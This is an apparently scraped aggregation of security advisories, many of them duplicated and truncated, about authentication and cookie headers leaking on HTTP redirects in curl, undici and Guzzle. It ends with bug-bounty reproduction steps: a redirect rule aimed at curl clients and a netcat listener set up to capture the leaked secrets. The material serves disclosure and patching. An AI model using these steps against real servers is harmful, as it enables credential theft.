CVE-2022-27776: A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 might leak authentication or cookie header data on HTTP redirects to the same host…

CVE-2022-31151 [CRITICAL] undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect ### Impact Authorization headers are already cleared on cross-origin redirect in https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872. However, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici. As such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd part

CVE-2022-31151 [CRITICAL] CWE-346 undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect ### Impact Authorization headers are already cleared on cross-origin redirect in https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872. However, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici. As such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd part

CVE-2022-31091 [MEDIUM] CWE-200 Change in port should be considered a change in origin Change in port should be considered a change in origin ### Impact `Authorization` and `Cookie` headers on requests are sensitive information. On making a request which responds with a redirect to a URI with a different port, if we choose to follow it, we should remove the `Authorization` and `Cookie` headers from the request, before containing. Previously, we would only consider a change in host or scheme downgrade. Now, we consider any change in host, port or scheme to be a change in origin. ### Patches Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.8 or 7.4.5. ### Workarounds An alternative approach would be to use your own redirect middleware, rather than ours, if you are un

CVE-2022-31090 [MEDIUM] CWE-200 CURLOPT_HTTPAUTH option not cleared on change of origin CURLOPT_HTTPAUTH option not cleared on change of origin ### Impact `Authorization` headers on requests are sensitive information. When using our Curl handler, it is possible to use the `CURLOPT_HTTPAUTH` option to specify an `Authorization` header. On making a request which responds with a redirect to a URI with a different origin, if we choose to follow it, we should remove the `CURLOPT_HTTPAUTH` and `CURLOPT_USERPWD` options before continuing, stopping curl from appending the `Authorization` header to the new request. Previously, we would only consider a change in host. Now, we consider any change in host, port or scheme to be a change in origin. ### Patches Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle s

CVE-2022-31091 [MEDIUM] Change in port should be considered a change in origin Change in port should be considered a change in origin ### Impact `Authorization` and `Cookie` headers on requests are sensitive information. On making a request which responds with a redirect to a URI with a different port, if we choose to follow it, we should remove the `Authorization` and `Cookie` headers from the request, before containing. Previously, we would only consider a change in host or scheme downgrade. Now, we consider any change in host, port or scheme to be a change in origin. ### Patches Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.8 or 7.4.5. ### Workarounds An alternative approach would be to use your own redirect middleware, rather than ours, if you are un

CVE-2022-31090 [MEDIUM] CURLOPT_HTTPAUTH option not cleared on change of origin CURLOPT_HTTPAUTH option not cleared on change of origin ### Impact `Authorization` headers on requests are sensitive information. When using our Curl handler, it is possible to use the `CURLOPT_HTTPAUTH` option to specify an `Authorization` header. On making a request which responds with a redirect to a URI with a different origin, if we choose to follow it, we should remove the `CURLOPT_HTTPAUTH` and `CURLOPT_USERPWD` options before continuing, stopping curl from appending the `Authorization` header to the new request. Previously, we would only consider a change in host. Now, we consider any change in host, port or scheme to be a change in origin. ### Patches Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle s

CVE-2022-27776 [MEDIUM] CWE-522 GHSA-hc85-wpv5-52wh: A insufficiently protected credentials vulnerability in fixed in curl 7 A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 might leak authentication or cookie header data on HTTP redirects to the same host but another port number.

CVE-2022-27776 [MEDIUM] CVE-2022-27776: A insufficiently protected credentials vulnerability in fixed in curl 7 A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 might leak authentication or cookie header data on HTTP redirects to the same host but another port number.

CVE-2022-22576 [HIGH] curl vulnerabilities curl vulnerabilities Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2. An attacker could possibly use this issue to access sensitive information. (CVE-2022-22576) Harry Sintonen discovered that curl incorrectly handled certain requests. An attacker could possibly use this issue to expose sensitive information. (CVE-2022-27774, CVE-2022-27775, CVE-2022-27776)

CVE-2022-27776 [MEDIUM] HackerOne: CVE-2022-27776 Insufficiently protected credentials vulnerability might leak authentication or cookie header data HackerOne: CVE-2022-27776 Insufficiently protected credentials vulnerability might leak authentication or cookie header data FAQ: Why is this a HackerOne CVE? This CVE is regarding a vulnerability in the curl open source library which is used by Windows. The July 2022 Windows Security Updates includes the most recent version of this library which addresses the vulnerability and others. Please see curl security problems for information on all of the vulnerabilities that have been addressed. Open Source Software: Open Source Software HackerOne: HackerOne Customer Action Required: Yes Impact: Information Disclosure Exploit Status: Publicly Disclosed:No;Exploited:No;Latest Software Release:Exploitation Less Likely;Older Software Release:Exploitation Less Likely;DOS:N/A Reference: https:

CVE-2022-27774 [HIGH] curl vulnerabilities Title: curl vulnerabilities Summary: Several security issues were fixed in curl. Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2. An attacker could possibly use this issue to access sensitive information. (CVE-2022-22576) Harry Sintonen discovered that curl incorrectly handled certain requests. An attacker could possibly use this issue to expose sensitive information. (CVE-2022-27774, CVE-2022-27775, CVE-2022-27776) Instructions: In general, a standard system update will make all the necessary changes.

CVE-2022-27776 [MEDIUM] CWE-522 curl: auth/cookie leak on redirect curl: auth/cookie leak on redirect A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 might leak authentication or cookie header data on HTTP redirects to the same host but another port number. A vulnerability was found in curl. This security flaw allows leak authentication or cookie header data on HTTP redirects to the same host but another port number. Sending the same set of headers to a server on a different port number is a problem for applications that pass on custom `Authorization:` or `Cookie:`headers. Those headers often contain privacy-sensitive information or data. Package: rh-dotnet31-curl (.NET Core 3.1 on Red Hat Enterprise Linux) - Out of support scope Package: curl (Red Hat Enterprise Linux 6) - Out of support scope Package: curl (Red Hat Ente

CVE-2022-27776 [MEDIUM] CVE-2022-27776: curl - A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 mig... A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 might leak authentication or cookie header data on HTTP redirects to the same host but another port number. Scope: local bookworm: resolved (fixed in 7.83.0-1) bullseye: resolved (fixed in 7.74.0-1.3+deb11u2) forky: resolved (fixed in 7.83.0-1) sid: resolved (fixed in 7.83.0-1) trixie: resolved (fixed in 7.83.0-1)

CVE-2022-27776 [MEDIUM] Credential leak on redirect Credential leak on redirect ## Summary: [add summary of the vulnerability] Curl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect , like the Proxy-Authorization 、x-auth-token header. It is a bypass of fix https://hackerone.com/reports/1547048 , CVE-2022-27776 . ## Steps To Reproduce: [add details for how we can reproduce the issue] 1. Create a 302.php file, such as: ``` ``` Add the 2 record in the /etc/hosts file: ``` 127.0.0.1 a.com 127.0.0.1 b.com ``` 2. curl -H "Proxy-Authorization: secrettoken" http://b.com/302.php -vv -L The redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port: ``` # curl -H "Proxy-Authorization: secrettoken" http://b.com/302.php -vv -L * Trying 127.0.0.1:80... * Connected to b.com

CVE-2022-27776 [MEDIUM] CVE-2022-27776: Auth/cookie leak on redirect CVE-2022-27776: Auth/cookie leak on redirect ## Summary: curl/libcurl can be coaxed to leak Authorization / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host). ## Steps To Reproduce: 1. Configure for example Apache2 to perform redirect with mod_rewrite: ``` RewriteCond %{HTTP_USER_AGENT} "^curl/" RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L] ``` ... the attacker could also use `.htpasswd` file to do so. 2. Set up netcat to listen for the incoming secrets: `while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' |

CVE-2022-27776 [MEDIUM] CVE-2022-27776: Auth/cookie leak on redirect CVE-2022-27776: Auth/cookie leak on redirect ## Summary: Curl can be coaxed to leak Authorisation / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host). ## Steps To Reproduce: 1. Configure for example Apache2 to perform redirect with mod_rewrite: ``` RewriteCond %{HTTP_USER_AGENT} "^curl/" RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L] ``` ... the attacker could also use `.htpasswd` file to do so. 2. Set up netcat to listen for the incoming secrets: `while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' | nc -v -